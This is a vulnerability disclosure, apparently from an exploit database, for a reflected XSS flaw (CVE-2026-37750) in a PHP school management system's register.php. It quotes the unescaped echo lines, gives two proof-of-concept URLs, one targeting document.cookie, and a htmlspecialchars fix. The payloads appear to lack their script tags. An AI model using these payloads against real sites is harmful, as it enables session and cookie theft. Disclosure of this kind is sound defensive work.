Exploit for CVE-2026-37750

## https://sploitus.com/exploit?id=BCA69165-8702-570C-A1B0-314C03C74C96
# CVE-2026-37750

# CVE-2026-37750 — School Management System 1.0 - Reflected XSS

## Details

| Field | Info |
|---|---|
| **CVE ID** | CVE-2026-37750 |
| **Type** | Reflected Cross-Site Scripting (XSS) |
| **Severity** | Medium (CVSSv3: 6.1) |
| **Vendor** | mahmoudai1 |
| **Product** | School Management System |
| **Version** | 1.0 |
| **Discoverer** | Varad AP Mene |
| **CWE** | CWE-79 |

## Vulnerable File
register.php — Registration form (unauthenticated)

## Vulnerable Code
```php
// Line 22
echo ucfirst($_REQUEST['type'])

// Line 26
echo $_REQUEST['type']
```
No htmlspecialchars() — raw user input reflected in HTML.

## Proof of Concept
**Payload 1 — XSS in h1 tag:**
    ```
    http://target/register.php?type=alert(document.cookie)
    ```

**Payload 2 — XSS in form action attribute:**
    ```
    http://target/register.php?type=">alert(1)
    ```

## Impact
- Session hijacking via cookie theft
- Phishing attacks
- No authentication required

## Remediation

```php
echo htmlspecialchars($_REQUEST['type'], ENT_QUOTES, 'UTF-8');
```

## Reference
https://github.com/mahmoudai1/school-management-system

## Discoverer
Varad AP Mene — menevarad007@gmail.com